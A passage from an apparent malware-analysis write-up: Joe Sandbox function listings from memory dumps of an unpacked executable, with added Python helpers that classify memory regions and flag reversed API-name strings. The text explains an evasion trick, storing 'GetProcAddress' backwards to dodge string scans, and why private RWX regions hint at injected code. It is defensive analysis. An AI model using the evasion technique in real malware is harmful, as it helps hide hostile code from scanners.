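        key = r.image_base if r.image_base is not None else r.base
        labels = groups.setdefault(key, {})
        labels[classify(r)] = labels.get(classify(r), 0) + 1
    return groups


# Constructed from the dump names on this page (Offset/PE for the Associated
# regions assumed to match the Source File lines that carry them).
SAMPLE_LINES = [
    "• Source File: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true",
    "• Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true",
    "• Source File: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true",
    "• Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true",
    "• Source File: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true",
    "• Source File: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true",
    "• Source File: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        r = parse_source_line(line)
        print(f"{r.base:08X} {r.protect_name:<22} {r.type_name:<11} {classify(r)}")
    for image, labels in summarize(SAMPLE_LINES).items():
        print(f"PE at {image:08X}: {labels}")
```

Run on the seven regions of the 028F0000 image, the decoder shows a read-only header page, an execute-read page at 028F1000, a read-write page at 0291E000 and four execute-read-write regions from 02977000 upward, all of them MEM_PRIVATE rather than MEM_IMAGE. A PE whose every page is private memory was written there by the sample itself instead of being mapped from a file by the loader, so the four RWX regions are the ones to dump and scan first, and a file-path based allow-list will not see them at all.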

APIs
• GetThreadLocale.KERNEL32(00000000,028FC08B,?,?,00000000,00000000), ref: 028FBDF6
  • Part of subcall function 028FA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 028FA7E2
Memory Dump Source
• Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
• Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
Similarity
• API ID: Locale$InfoThread
• String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
• API String ID: 4232894706-2493093252
• Opcode ID: 91ce821f82ff4af3817d0c09dd9e0ef45419fa8a82f1dfcc432c86fcead439de
• Instruction ID: e7fcd2368355f1e2bcf81bbae1ec8b47d9b5c944af0f175f590da5118c09d94c
• Opcode Fuzzy Hash: 91ce821f82ff4af3817d0c09dd9e0ef45419fa8a82f1dfcc432c86fcead439de
• Instruction Fuzzy Hash: 8B61433CB1024C5BDB84E7A8D850ADF77BBDB88304F508436A305EB745DA39DA1A8F52

APIs
• IsBadReadPtr.KERNEL32(?,00000004), ref: 0290B000
• GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 0290B017
• IsBadReadPtr.KERNEL32(?,00000004), ref: 0290B0AB
• IsBadReadPtr.KERNEL32(?,00000002), ref: 0290B0B7
• IsBadReadPtr.KERNEL32(?,00000014), ref: 0290B0CB
Memory Dump Source
• Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
• Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
Similarity
• API ID: Read$HandleModule
• String ID: KernelBase$LoadLibraryExA
• API String ID: 2226866862-113032527
• Opcode ID: 4598213475649141bb59028087c9083b00ff0602b539d049ec1b04b43289ee89
• Instruction ID: 1a6a8168b2d5416fd5d85a5a1c5b188684ddaa715f62375ce60218db80a55bd7
• Opcode Fuzzy Hash: 4598213475649141bb59028087c9083b00ff0602b539d049ec1b04b43289ee89
• Instruction Fuzzy Hash: BC314F75A40309BFDB60DB68CCC5F5977BCBF05358F004610EA24EB2C5D374A9408BA4

APIs
• GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028F4423,?,?,029767C8,?,?,0291E7A8,028F65B1,0291D30D), ref: 028F4395
• WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028F4423,?,?,029767C8,?,?,0291E7A8,028F65B1,0291D30D), ref: 028F439B
• GetStdHandle.KERNEL32(000000F5,028F43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028F4423,?,?,029767C8), ref: 028F43B0
• WriteFile.KERNEL32(00000000,000000F5,028F43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028F4423,?,?), ref: 028F43B6
• MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 028F43D4
Memory Dump Source
• Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
• Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
Similarity
• API ID: FileHandleWrite$Message
• String ID: Error$Runtime error at 00000000
• API String ID: 1570097196-2970929446
• Opcode ID: 8025a4acfd604310455636980d9143b4041da9a85cd2a536b22fc847deba27b3
• Instruction ID: 8b13f1fe9ace5b554dc46cd63724e6b011f5c77da718744550d09e97ded5232c
• Opcode Fuzzy Hash: 8025a4acfd604310455636980d9143b4041da9a85cd2a536b22fc847deba27b3
• Instruction Fuzzy Hash: EFF0B46DBC8344B9FA50A2A86C4AF6A276C4B45F21F541A06B768E40C2CBA440D88B23

Memory Dump Source
• Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
• Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: f361c4fdd0f35bb0b590f5a399794b5d5c57f6d7c3c5bbd0b76040d27d65b4a3
• Instruction ID: f59fcf3ffa31c7fb3ee7b2d07c1d03b4f7f2ecddd1299d5a03b75db2f839f839
• Opcode Fuzzy Hash: f361c4fdd0f35bb0b590f5a399794b5d5c57f6d7c3c5bbd0b76040d27d65b4a3
• Instruction Fuzzy Hash: 1A61C171900205AFDB22DF68C841BAEBBF9FF89720F64456DE958EB241E7309D41CB61

Memory Dump Source
• Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
• Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
• Instruction ID: 5768710533ba1c684e8bef35d3f7dcd9b2033c71338bc5c5cf7144bc20839d22
• Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
• Instruction Fuzzy Hash: C4111F71580B04AAD622BBB0CC4DFCB7B9EAFC5740F908C19A29D76450DA79F9044E51

APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0298873B
• int.LIBCPMT ref: 0298874E
  • Part of subcall function 0298568C: std::_Lockit::_Lockit.LIBCPMT ref: 0298569D
  • Part of subcall function 0298568C: std::_Lockit::~_Lockit.LIBCPMT ref: 029856B7
• std::_Facet_Register.LIBCPMT ref: 0298878E
• std::_Lockit::~_Lockit.LIBCPMT ref: 02988797
• __CxxThrowException@8.LIBVCRUNTIME ref: 029887B5
Memory Dump Source
• Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
• Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
• String ID: (mG
• API String ID: 2536120697-4059303827
• Opcode ID: 4fb09889b2dc78d6b9bc341806ed1c893def47308d87ec9f5bd5aa626124b671
• Instruction ID: 65eab575d61051fb7cba4f8c702b98188872e5d9cf8ea912f4766ea8adf29b6f
• Opcode Fuzzy Hash: 4fb09889b2dc78d6b9bc341806ed1c893def47308d87ec9f5bd5aa626124b671
• Instruction Fuzzy Hash: 0B112C76500218ABCB14FBA8D9408DEB77AEFC0710B56456BE918AB290DF359E45CFD0

APIs
  • Part of subcall function 028FAD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 028FAD59
  • Part of subcall function 028FAD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 028FAD7D
  • Part of subcall function 028FAD3C: GetModuleFileNameA.KERNEL32(028F0000,?,00000105), ref: 028FAD98
  • Part of subcall function 028FAD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 028FAE2E
• CharToOemA.USER32(?,?), ref: 028FAEFB
• GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 028FAF18
• WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 028FAF1E
• GetStdHandle.KERNEL32(000000F4,028FAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 028FAF33
• WriteFile.KERNEL32(00000000,000000F4,028FAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 028FAF39
• LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 028FAF5B
• MessageBoxA.USER32(00000000,?,?,00002010), ref: 028FAF71
Memory Dump Source
• Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
• Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
Similarity
• API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
• String ID:
• API String ID: 185507032-0
• Opcode ID: 6dfc5430a343fdd4e7b0dc040015d3ed3dbc77dc64f814802e9c7fa920f17ff3
• Instruction ID: dc3172198aab26cc8488e3d1903044806c08c985c6447303fba6b2aa59a52712
• Opcode Fuzzy Hash: 6dfc5430a343fdd4e7b0dc040015d3ed3dbc77dc64f814802e9c7fa920f17ff3
• Instruction Fuzzy Hash: 00115EBE548304BAD280FBA8CC81F9B77BDAB44710F404A15B758DA0D0EA75E9048B63

APIs
• __allrem.LIBCMT ref: 029B2279
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 029B2295
• __allrem.LIBCMT ref: 029B22AC
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 029B22CA
• __allrem.LIBCMT ref: 029B22E1
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 029B22FF
Memory Dump Source
• Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
• Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
• String ID:
• API String ID: 1992179935-0
• Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
• Instruction ID: a4923bb492616656baa9fa3df947f181a20888b5d1967fabbc3311f3c527d4dd
• Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
• Instruction Fuzzy Hash: BF81C572E00B069BE7279B68CD41BEA73EEEF84764F24453EE911D7280E774D9018B51

Memory Dump Source
• Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
• Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 6cafc8de57892fd614af7c3accbdcbc7a01b4784fb7c252a1c394b1424185e80
• Instruction ID: ba31afece59387d090e3783622871f753e67e90b5c9fb71507c839740d4a4063
• Opcode Fuzzy Hash: 6cafc8de57892fd614af7c3accbdcbc7a01b4784fb7c252a1c394b1424185e80
• Instruction Fuzzy Hash: A451C0B79042116BDF27AF68D948BFAB7ADDF85724F14406AED449B240EB329D01C7A0

Memory Dump Source
• Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
• Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
Similarity
• API ID: __cftoe
• String ID:
• API String ID: 4189289331-0
• Opcode ID: 30f97a14dd6f87c9245b8e0b778041a74f07a421c1ac77e9beff42b74887127b
• Instruction ID: 6234c4edf3374a6084a4847f96fd8b14146ff790b87f0d368c7335a156502bc7
• Opcode Fuzzy Hash: 30f97a14dd6f87c9245b8e0b778041a74f07a421c1ac77e9beff42b74887127b
• Instruction Fuzzy Hash: 9E511B72904205AFDF269B688E44FEE77ADAF89324F14426BF819E6181DB31D501CA74
                                                          APIs
                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 028FE625
                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 028FE641
                                                          • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 028FE67A
                                                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 028FE6F7
                                                          • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 028FE710
                                                          • VariantCopy.OLEAUT32(?,00000000), ref: 028FE745
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                          • String ID:
                                                          • API String ID: 351091851-0
                                                          • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                          • Instruction ID: b1ae6e2e7411cab1dc8c5d854adac4aec59a995b7ee98975465b8e40e24b801a
                                                          • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                          • Instruction Fuzzy Hash: BE51E97D90122D9BCBA2DB58CC80BD9B3BDAF49300F0041D5E709E7211DA34AF858F65
                                                          APIs
                                                            • Part of subcall function 029ABD91: __onexit.LIBCMT ref: 029ABD97
                                                          • __Init_thread_footer.LIBCMT ref: 02978E4E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Init_thread_footer__onexit
                                                          • String ID: PkG$XMG$NG$NG
                                                          • API String ID: 1881088180-3151166067
                                                          • Opcode ID: 49aca21aedc77406ad6ecb676b3e8f12959c6e3be557b7633b64e8435ff40de0
                                                          • Instruction ID: d3f35e433c967b6b5513c450bccbd112ef2ad66087a729d38a2913904df9f2d2
                                                          • Opcode Fuzzy Hash: 49aca21aedc77406ad6ecb676b3e8f12959c6e3be557b7633b64e8435ff40de0
                                                          • Instruction Fuzzy Hash: 44418D311042609BD324FB24DCA8AEE73ABEFD5724F50453EE54A961E0DF30694ACF5A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PkGNG
                                                          • API String ID: 0-263838557
                                                          • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                          • Instruction ID: d91477afb0b45f7bd078434c253b5b02cf43b76a487c0692a4c91a9e8a4b8419
                                                          • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                          • Instruction Fuzzy Hash: DC41FA76910304AFE7259F78CA40BEABBE9EFC8710F10456EE656DB280D77199418F90
                                                          APIs
                                                          • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028F35BA
                                                          • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,028F3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028F35ED
                                                          • RegCloseKey.ADVAPI32(?,028F3610,00000000,?,00000004,00000000,028F3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028F3603
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                          • API String ID: 3677997916-4173385793
                                                          • Opcode ID: d64a680c2d58bc0e9d61f9a7a873a91354b7c51bd300a35843df408d8cca54a1
                                                          • Instruction ID: 29f17367329dc28d3b4265cd66573d649d268d68da47627fa10071634d314a51
                                                          • Opcode Fuzzy Hash: d64a680c2d58bc0e9d61f9a7a873a91354b7c51bd300a35843df408d8cca54a1
                                                          • Instruction Fuzzy Hash: AC01B17D944258BAFB51DBD1CD02BB977FCDB08B00F1005A2FF04D6780E678AA10DA69
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029082FC,?,?,00000000,00000000,?,02908215,00000000,KernelBASE,00000000,00000000,0290823C), ref: 029082C1
                                                          • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029082C7
                                                          • GetProcAddress.KERNEL32(?,?), ref: 029082D9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc$HandleModule
                                                          • String ID: Kernel32$sserddAcorPteG
                                                          • API String ID: 667068680-1372893251
                                                          • Opcode ID: c3bd4343a9ee29e83c64e3eef0722675c024e43faf80f4b38bb523eb84207562
                                                          • Instruction ID: 2235a7a4d8da742669908b4e5918aac79f82c7061ff8025c793045b0712899b4
                                                          • Opcode Fuzzy Hash: c3bd4343a9ee29e83c64e3eef0722675c024e43faf80f4b38bb523eb84207562
                                                          • Instruction Fuzzy Hash: 2A016C7C744308EFEB44EBA8EC81EAEB7EEFB8C710F514461BA00D7641D574A904CA25
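Two of the function blocks above deserve a triage note that the listing itself does not make. The block at refs 028F35BA to 028F3603 opens HKLM\SOFTWARE\Borland\Delphi\RTL and reads FPUMaskValue; that is what the Delphi runtime's startup code does in every Delphi-built executable, so it fingerprints the compiler, not attacker intent. The block at refs 029082C1 to 029082D9 calls GetModuleHandleW("Kernel32") and then GetProcAddress twice, and its string set contains "sserddAcorPteG", which is "GetProcAddress" written backwards: the import name is stored reversed so a plain string scan does not see it, and un-reversed at run time for dynamic resolution. The helper below, an added example that is not part of the Joe Sandbox report or of the analysed sample, takes the "String ID" bullets as they appear in these blocks, splits them on the '$' separator the report uses (an assumption taken from the visible bullets), flags strings that are known export names stored backwards, and labels the Delphi RTL key as a runtime artifact. KNOWN_APIS is a deliberately short hypothetical allow-list and the RUNTIME_ARTIFACTS notes are the editor's own; the sample input is constructed from the three bullets visible above.

```python
"""Added triage helper for strings lifted from Joe Sandbox function blocks.

Not part of the report or of the analysed sample. It acts on two observations
from the blocks above:
  * "sserddAcorPteG" next to GetModuleHandleW/GetProcAddress calls is
    "GetProcAddress" stored backwards: a cheap way to keep an import name out
    of static string scans while still resolving it at run time;
  * HKLM\\SOFTWARE\\Borland\\Delphi\\RTL\\FPUMaskValue is read by the Delphi
    runtime's startup code in every Delphi-built module, so it identifies the
    compiler rather than attacker behaviour.
"""

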